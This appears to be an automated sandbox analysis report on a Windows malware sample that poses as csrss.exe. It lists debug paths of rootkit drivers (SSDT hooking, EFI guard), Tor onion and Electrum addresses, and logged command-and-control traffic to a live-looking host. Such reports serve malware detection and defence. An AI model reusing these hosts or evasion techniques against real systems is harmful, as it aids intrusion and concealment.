            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.360314790.0000000000C57000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.370257629.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627870906.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.392824484.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.406627827.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.408434896.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.428005891.0000000000C57000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000026.00000002.427962622.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdb source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: f6oNLRKHUy.exe, 00000001.00000002.359471707.0000000000A5B000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368504046.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.627104144.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391731285.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404853371.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.407309703.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427402619.0000000000A5B000.00000040.00020000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00B5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,34_2_00007FF6A00B5C10

            Networking:

            Found Tor onion address
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not 
supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
            Source: f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmp String found in binary or memory: the same string as in the preceding entry
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Oct 2021 10:39:11 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 2344Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=um4jgmu5MJYrCALOja4WSnT%2BKIqMmUbFD6XsWL2Jk3lxPjw2VqysVmcC9mrM%2BGwFqp0T%2Bv78FIyQfHnQlthqFSIsBnaG1oJt9USn6g%2BEBiwQGd5bp0SiF0DtnQnx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6a119ef28d8f68f2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0Content-Length: 644Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 YaBrowser/20.2.4.143 Yowser/2.5 Safari/537.36Content-Length: 664Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: POST /api/poll HTTP/1.1Host: server12.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Length: 664Accept-Encoding: gzip
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:38:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11CF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgH1j2HJCY1PRrFLZl7AB6WEYhGar0eyGh1Olq8Yrqc4KyXlqKkIUG1R2oMtRRN4E%2B5caViwgYNDD%2BHbwz0YxpqhoClLcU1HQOg3gjevpe9gtDOl1RdkeurtWdZscezbsM8CVdgC9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119e7accff4a85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:38:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=er4u6n5slre08iuqa9ddhgfmgo; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rgb7JlualPWZhQeqXYWeh98Yrz9b8%2BunEhKY0AvJLX2REx0Xd8N8HyfLKgF2ERcI3yi3xhLeBgnu5NHC6J9E5ruHDbsbBALuGedShIpMoxThl84EGih4rVj%2FVnDNpL%2BZGrUMIAbITQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119e9beb7542db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:39:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=ihictia5gvlqkfgn9rmhuf8pgc; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VuZcu8Rp0SwcfAOzPsHBuPj8LCUZ6Ql2CEt1HD5sqBnqtU7hoJEDNbHv2yW9Dp%2FVUrCT%2FMt5dFBhjq16uaYLIFwI0FrCkFe%2BuY0VdV4IHuLCKxmh8AywoOMlraByjzwDwLVsZ8YsgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a119fb55fa42488-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Oct 2021 10:41:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-powered-by: PHP/8.0.11set-cookie: PHPSESSID=r0bvjm1tq2m76j34nbfn7o10n5; path=/; HttpOnlyexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheaccess-control-allow-credentials: falseCF-Cache-Status: DYNAMICExpect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4VproYKIjqRa5RSHQqMpqU3WrJiRn2KWRmnj96dUzXH3TZePk9Kqh%2F4AwUlTri5%2FQ9kQkVvBt%2B3ca7g1AsCTMQt5dvyz91Q3y2ZTNtGrdiVJaPbYOuTh0im3PuIagx%2BOd7HgGnw%2FQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a11a19e1ed14de2-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Source: csrss.exeString found in binary or memory: .30 Version/10.61facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)tls: received unexpected handshake message of type %T when waiting for %TBlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103Mozilla/5.0 (Windows NT equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: lla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)2695994666715063979466701508701962594045780771442439172168272236806126959946667150639794667015087019630673557916260026308143510066 equals www.facebook.com (Facebook)
            Source: csrss.exeString found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
            Source: csrss.exeString found in binary or memory: http://builtwith.com/biup)
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: f6oNLRKHUy.exe, 00000001.00000002.359410341.00000000009FB000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.368261402.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.626664196.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.391449877.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.404732093.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.406989767.00000000009FB000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.427329683.00000000009FB000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
